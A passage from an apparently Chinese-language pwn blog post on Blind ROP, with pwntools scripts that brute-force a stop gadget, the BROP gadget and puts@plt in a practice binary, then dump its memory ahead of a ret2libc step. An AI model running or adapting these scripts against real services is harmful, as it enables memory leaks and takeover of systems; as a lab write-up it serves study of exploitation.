class="built_in">print</span>(length)</span><br></pre></td></tr></table></figure>

<img src="/2022/01/31/BROP/%E2%91%A0get_length.jpg" class>

<p>以下脚本跑出 stop gadget</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_stop_gadget</span>(<span class="params">length</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    <span class="keyword">while</span> addr &lt; <span class="number">0x401000</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = process(<span class="string">&quot;./brop&quot;</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            payload = <span class="string">&#x27;a&#x27;</span>*length + p64(addr) + p64(<span class="number">0</span>)*<span class="number">10</span></span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            content = p.recv(timeout = <span class="number">0.2</span>)</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;WelCome my friend,Do you know password?&quot;</span> <span class="keyword">in</span> content:</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&#x27;one_stop_gadget is at &#x27;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">                log_in_file(addr)  </span><br><span class="line">            addr += <span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            addr += <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">log_in_file</span>(<span class="params">addr</span>):</span></span><br><span class="line">    f = <span class="built_in">open</span>(<span class="string">&#x27;puts.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">    f.write(<span class="string">&quot;the addr:0x%x\n&quot;</span>%addr)</span><br><span class="line">    f.close()</span><br><span class="line">    </span><br><span class="line">find_stop_gadget(<span class="number">72</span>)</span><br></pre></td></tr></table></figure>

<p>注意这里我们将回显的内容设置成了程序一开始显示的内容，因为我们可以选择将能返回到main函数（或者说出现最开始的回显的函数，这里我们当作是main函数出现的回显）的地址作为 stop gadget，这其中可能包含了 main 函数的地址或 start 函数的地址等，程序返回到main函数的话因为程序会等待我们的输入，所以程序会hang在那里，达到 stop gadget 的预期作用。跑完我们得到如下地址：</p>
<img src="/2022/01/31/BROP/%E2%91%A0get_stop_gadget.jpg" class>

<p>我们随便找个地址进行测试，看看程序是否会返回到main函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*length + p64(<span class="number">0x4005cf</span>)</span><br></pre></td></tr></table></figure>

<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-3.jpg" class>

<p>看到这个地址成功的让我们返回到main函数并让程序不终止，我们选择其作为 stop gadget（其实为了防止出现特殊情况，最好选择正常一点的地址）</p>
<p>接下来跑出 Brop gadget</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_Brop_gadget</span>(<span class="params">length,stop_gadget_addr,addr</span>):</span></span><br><span class="line">    payload = <span class="string">&#x27;a&#x27;</span>*length + p64(addr) + p64(<span class="number">0</span>)*<span class="number">6</span> + p64(stop_gadget_addr) + p64(<span class="number">0</span>)*<span class="number">10</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p = process(<span class="string">&quot;./brop&quot;</span>)</span><br><span class="line">        p.recv()</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        content = p.recv(timeout = <span class="number">0.1</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;WelCome my friend,Do you know password?&quot;</span> <span class="keyword">in</span> content:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">except</span> EOFError:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check_Brop_gadget</span>(<span class="params">length,addr</span>):</span></span><br><span class="line">    payload = <span class="string">&#x27;a&#x27;</span>*length + p64(addr) + p64(<span class="number">0</span>)*<span class="number">10</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p = process(<span class="string">&quot;./brop&quot;</span>)</span><br><span class="line">        p.recv()</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        content = p.recv(timeout = <span class="number">0.1</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;WelCome my friend,Do you know password?&#x27;</span> <span class="keyword">in</span> content:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">except</span> EOFError:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_Brop_gadget</span>(<span class="params">length,stop_gadget_addr</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        <span class="keyword">if</span>(get_Brop_gadget(length,stop_gadget_addr,addr)):</span><br><span class="line">            <span class="built_in">print</span> <span class="string">&#x27;possible Brop_gadget at &#x27;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">            <span class="keyword">if</span>(check_Brop_gadget(length,addr)):</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&#x27;success Brop_gadget at &#x27;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">                <span class="keyword">return</span> addr</span><br><span class="line">        addr += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">find_Brop_gadget(<span class="number">72</span>,<span class="number">0x4005cf</span>)</span><br></pre></td></tr></table></figure>

<img src="/2022/01/31/BROP/%E2%91%A0get_Brop_gadget.jpg" class>

<p>接下来尝试跑出 puts@plt</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_puts_plt</span>(<span class="params">length,pop_rdi_ret</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = process(<span class="string">&quot;./brop&quot;</span>)</span><br><span class="line">            p.recv()</span><br><span class="line">            payload = <span class="string">&#x27;a&#x27;</span>*length + p64(pop_rdi_ret) + p64(<span class="number">0x400000</span>) + p64(addr) + p64(<span class="number">0</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            content = p.recv(timeout=<span class="number">0.1</span>)</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;\x7fELF&#x27;</span> <span class="keyword">in</span> content:</span><br><span class="line">                <span class="built_in">print</span> <span class="string">&quot;We found puts_plt at: &quot;</span> + <span class="built_in">hex</span>(addr)</span><br><span class="line">                <span class="keyword">return</span> addr</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                addr += <span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            addr += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">find_puts_plt(<span class="number">72</span>,<span class="number">0x4007ba</span>+<span class="number">9</span>)</span><br></pre></td></tr></table></figure>

<img src="/2022/01/31/BROP/%E2%91%A0get_puts_plt.jpg" class>

<p>发现成功跑出来了，说明程序使用了 puts 函数，然后我们用这个地址进行测试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*length + p64(pop_rdi_ret) + p64(<span class="number">0x400000</span>) + p64(<span class="number">0x400550</span>)</span><br></pre></td></tr></table></figure>

<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-4.png" class>

<p>发现似乎并不对，我们对照程序分析发现 0x400560 处才是 puts@plt 的地址，0x400550 是 plt 表的表头，我们选择 0x400560 进行测试</p>
<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-5.png" class>

<p>发现是正确的，所以用如上脚本跑出的 puts@plt 的地址需要进行测试（可能是由于plt表结构的原因，这里没太想明白）</p>
<p>最后我们利用输出函数多次dump程序内存即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span>(<span class="params">length,pop_rdi_ret,puts_plt,addr</span>):</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p = process(<span class="string">&quot;./brop&quot;</span>)</span><br><span class="line">        p.recv()</span><br><span class="line">        payload = <span class="string">&#x27;a&#x27;</span>*length + p64(pop_rdi_ret) + p64(addr) + p64(puts_plt)</span><br><span class="line">        p.sendline(payload)</span><br><span class="line">        content = p.recv(timeout=<span class="number">0.2</span>)</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            data = content[:content.index(<span class="string">&quot;\n&quot;</span>)]</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            data = content</span><br><span class="line">        <span class="keyword">if</span> data == <span class="string">&#x27;&#x27;</span>:</span><br><span class="line">            data = <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">        <span class="keyword">return</span> data</span><br><span class="line">    <span class="keyword">except</span> EOFError:</span><br><span class="line">        p.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leakfunction</span>(<span class="params">length,pop_rdi_ret,puts_plt</span>):</span></span><br><span class="line">    addr = <span class="number">0x400000</span></span><br><span class="line">    result = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">while</span> addr &lt; <span class="number">0x401000</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="built_in">hex</span>(addr)</span><br><span class="line">        data = leak(length,pop_rdi_ret,puts_plt,addr)</span><br><span class="line">        <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            result += data</span><br><span class="line">            addr += <span class="built_in">len</span>(data)</span><br><span class="line">        f = <span class="built_in">open</span>(<span class="string">&#x27;dump&#x27;</span>,<span class="string">&#x27;wb&#x27;</span>)</span><br><span class="line">        f.write(result)</span><br><span class="line">        f.close()</span><br><span class="line"></span><br><span class="line">leakfunction(<span class="number">72</span>,<span class="number">0x4007ba</span>+<span class="number">9</span>,<span class="number">0x400560</span>)</span><br></pre></td></tr></table></figure>

<p>将我们dump出的程序拖到IDA里，选择 Binary file 模式，将 Loading segment 和 Loading offset 都设置为 0x400000</p>
<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-6.jpg" class>

<p>在我们得到的 puts@plt 的地址处按 c 反汇编，由此我们得到 puts 函数的 got 表地址</p>
<img src="/2022/01/31/BROP/%E2%91%A0%E5%88%86%E6%9E%90-7.jpg" class>

<p>接下来只需要常规的 ret2libc 即可</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/BROP/" rel="tag"># BROP</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/30/%E9%94%99%E4%BD%8D%E6%9E%84%E9%80%A0gadget/" rel="prev" title="错位构造gadget">
      <i class="fa fa-chevron-left"></i> 错位构造gadget
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/02/04/ret2_dl_resolve/" rel="next" title="ret2_dl_resolve">
      ret2_dl_resolve <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">1.</span> <span class="nav-text">知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#stop-gadget"><span class="nav-number">1.0.1.</span> <span class="nav-text">stop gadget</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Brop-gadget"><span class="nav-number">1.0.2.</span> <span class="nav-text">Brop gadget</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AF%BB%E6%89%BEplt%E8%A1%A8"><span class="nav-number">1.0.3.</span> <span class="nav-text">寻找plt表</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#dump%E8%BF%9C%E7%A8%8B"><span class="nav-number">1.0.4.</span> <span class="nav-text">dump远程</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E9%83%A8%E5%88%86"><span class="nav-number">1.0.5.</span> <span class="nav-text">脚本部分</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98"><span class="nav-number">2.</span> <span class="nav-text">例题</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">41</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">26</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
